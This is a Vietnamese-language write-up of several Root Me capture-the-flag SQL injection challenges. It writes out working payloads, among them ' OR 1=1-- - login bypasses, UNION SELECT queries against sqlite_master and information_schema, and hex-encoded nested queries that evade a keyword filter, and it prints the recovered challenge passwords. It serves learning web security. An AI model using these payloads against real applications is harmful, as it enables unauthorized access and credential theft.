# Hi bro, tắt quyền chỉnh sửa đi nhé=)))
# ROOT ME
## SQL injection - Authentication

tại chall này yêu cầu lấy được password của ad
nên em sẽ sử dụng burpsuite xem thử code web này

em nhận được báo lỗi

xem trả về của code

ở đây nhận giá trị input trực tiếp vào SQL, không có bước xử lý đầu vào nên đây có thể tấn công SQLi
em sẽ thử bằng cách thêm ``` ' OR 1=1-- - ```
nó đóng vai trò như comment
và 1=1 luôn đúng

ở đây đã đăng nhập được, xem response trả về có passwword là```TYsgv75zgtq```
em sẽ submit kết quả này

chall này em ghi nhiều chứ thật ra ```' or 1=1-- -``` r ctrl-U là có pass r
## SQL injection - Authentification - GBK
chall này em bí =((
đọc wu cũng chưa thẩm được nên em chưa giải wu lại
## SQL injection - string






tại respond em thấy xuất hiện lỗi SQLite3
em sẽ search avf tìm hiểu cách khai thác bảng trong SQLite3
em tìm đc cấu truy vấn ```from sqlite_master```
em thử với bài, kết hợp với 2 cột khai thác đc ở trên

tại chall này cần lấy password của ad nên em sẽ khai thác từ cột user

không được, thử lại

có tài khoản admin, vậy em lấy pass
pass: c4K04dtIaJsuWdi

## SQL Injection - Routed


thử attack login nhưng không khả thi mấy

thử sang search


đều bị phát hiện tấn công

nhưng mà ```union select``` có vẻ khai thác được gì đó


**MariaDB là gì :vvv ???**
MariaDB là hệ quản trị CSDL được phát triển từ hệ quản trị CSDL mã nguồn mở MySQL.
MariaDB là sự kết hợp của cả 2 loại cơ sở dữ liệu là SQL và NoSQL
Khúc này r em cũng không biết sao nữa, nên em có đọc wu trên mạng
em đọc wu thì biết chall này lồng query 2 vào query 1
và có decode mã hex để giải chall này
tại chall này nó bắt lỗi các attack từ khóa nên nó sẽ phát hiện attacked liền
nên sẽ thực hiện chuyển câu truy vấn trên sang mã hex

và lồng query 2 vào query 1
```' union select 1' order by 3-- - ```
=> ```' union select 0x27206F726465722062792033202D2D202D-- -```

ở đây có thông báo không vượt quá 3 cột, có thể đoán 2 cột 1 cột là user 1 cột password
khai thác tên bảng
```'uninon select 'union select 1, table_name from information_schema.tables where table_schema = database() -- - -- -```
=> ```'union select 202720756E696F6E2073656C65637420312C207461626C655F6E616D652066726F6D20696E666F726D6174696F6E5F736368656D612E7461626C6573207768657265207461626C655F736368656D61203D2064617461626173652829202D2D202D202D2D202D-- -'

```' union select ' union SELECT 1,group_concat(column_name) FROM information_schema.columns WHERE table_name = 'users'-- - -- -```
=>```' union select 0x2720756E696F6E2053454C45435420312C67726F75705F636F6E63617428636F6C756D6E5F6E616D65292046524F4D20696E666F726D6174696F6E5F736368656D612E636F6C756D6E73205748455245207461626C655F6E616D65203D20277573657273272D2D202D202D2D202D-- -```

tiếp tục lấy thông tin
```' union select ' union select 1,concat(login,password) from users -- - -- -```
=> ```' union select 0x2720756E696F6E2073656C65637420312C636F6E636174286C6F67696E2C70617373776F7264292066726F6D207573657273202D2D202D202D2D202D-- -```

pass: qs89QdAs9A
## SQL injection Digital

start the chall

ở đây có 3 mục và có phần login
thử login "ad' OR 1=1-- -"

ko có kết quả gì
thử quay lại 3 mục ban đầu, thấy có "id=1"

thử thêm ' vào sau id=1 , thì xuất hiện lỗi

ở đây hiện lỗi SQLite3
thử chèn thêm vào URL thử đc gì không
ở đây em sẽ dùng order by thử

``` union select 1,2,3-- -``` chall này giống bài tk Khôi cho làm

ở đây thử khai thác thông tin ở cột 2 và cột 3
thử cột 2 trước
```1,sql,3 FROM sqlite_master--```

tới đây trích xuất thông tin của users để lấy username và password

pass: aTlkJYLjcbLmue3
## SQL injection - Error

thử thực hiện câu lệnh attack cơ bản nhưng đều ko login đc
em thử thêm ' vào sau URL xem trang báo lỗi ko?

thfi trang đã xảy ra lỗi
tại chall này vào content thì nó yêu cầu phải login
nhưng khi em thử thêm ' vào sau URL luôn thì nó báo lỗi

có lẽ đây là lỗi có thể khai thác đc từ trong bài
em thử thay đổi các tham số đầu vào của order mà em bí r